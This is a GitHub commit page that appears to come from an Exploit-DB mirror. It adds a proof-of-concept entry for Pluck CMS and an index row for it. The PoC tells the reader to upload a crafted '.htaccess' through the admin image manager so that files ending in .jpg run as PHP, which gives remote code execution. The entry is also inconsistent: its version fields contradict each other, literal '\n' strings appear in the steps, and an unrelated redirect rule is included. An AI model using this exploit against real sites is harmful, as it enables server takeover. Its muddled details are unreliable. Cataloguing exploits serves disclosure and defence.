Skip to content

Commit 52e9863

Browse files
author
certcc-ghbot
committed
Merge remote-tracking branch 'upstream/main'
2 parents 603285f + 6fbba66 commit 52e9863

File tree

2 files changed

+23
-0
lines changed

2 files changed

+23
-0
lines changed

exploits/php/webapps/52460.txt

Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
# Exploit Title: Pluck 4.7.7-dev2 - PHP Code Execution
2+
# Date: 2024-10-26
3+
# Exploit Author: CodeSecLab
4+
# Vendor Homepage: https://github.com/pluck-cms/pluck
5+
# Software Link: https://github.com/pluck-cms/pluck
6+
# Version: 4.74-dev5
7+
# Tested on: Ubuntu Windows
8+
# CVE : CVE-2018-11736
9+
10+
PoC:
11+
1)
12+
1. Log in to the Pluck admin panel.\n
13+
2. Navigate to the 'Manage Images' section at http://pluck1/admin.php?action=images.\n
14+
3. Upload a file named '.htaccess' with the content-type 'image/jpeg' containing 'AddType application/x-httpd-php .jpg'.\n
15+
4. Access the target directory (e.g., http://pluck1/images/test.jpg) to execute PHP code with the .jpg extension.
16+
17+
2)
18+
.htaccess content:
19+
RewriteEngine On
20+
RewriteRule .* http://www.baidu.com/ [R,L]
21+
22+
[Replace Your Domain Name]

files_exploits.csv

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -28347,6 +28347,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2834728347
15577,exploits/php/webapps/15577.html,"Plogger Gallery 1.0 - Cross-Site Request Forgery (Change Admin Password)",2010-11-19,Or4nG.M4N,webapps,php,,2010-11-19,2010-11-19,0,OSVDB-69455,,,,,
2834828348
37305,exploits/php/webapps/37305.txt,"Plogger Photo Gallery - SQL Injection",2012-05-22,"Eyup CELIK",webapps,php,,2012-05-22,2015-06-19,1,OSVDB-39764;CVE-2007-6587,,,,,https://www.securityfocus.com/bid/53644/info
2834928349
28868,exploits/php/webapps/28868.txt,"PLS-Bannieres 1.21 - 'Bannieres.php' Remote File Inclusion",2006-10-27,Mahmood_ali,webapps,php,,2006-10-27,2013-10-11,1,,,,,,https://www.securityfocus.com/bid/20772/info
28350+
52460,exploits/php/webapps/52460.txt,"Pluck 4.7.7-dev2 - PHP Code Execution",2025-12-08,CodeSecLab,webapps,php,,2025-12-08,2025-12-08,0,CVE-2018-11736,,,,,
2835028351
6074,exploits/php/webapps/6074.txt,"Pluck CMS 4.5.1 (Windows) - 'blogpost' Local File Inclusion",2008-07-14,BugReport.IR,webapps,php,,2008-07-13,2016-12-13,1,OSVDB-47012;CVE-2008-3194,,,,,
2835128352
32168,exploits/php/webapps/32168.txt,"Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",webapps,php,,2008-08-05,2016-12-13,1,CVE-2008-3574;OSVDB-47433;OSVDB-47432;OSVDB-47431;OSVDB-47430,,,,,https://www.securityfocus.com/bid/30542/info
2835228353
6300,exploits/php/webapps/6300.txt,"Pluck CMS 4.5.2 - Multiple Local File Inclusions",2008-08-25,DSecRG,webapps,php,,2008-08-24,,1,OSVDB-47874;CVE-2008-3851;OSVDB-47778,,,,,

0 commit comments

Comments
 (0)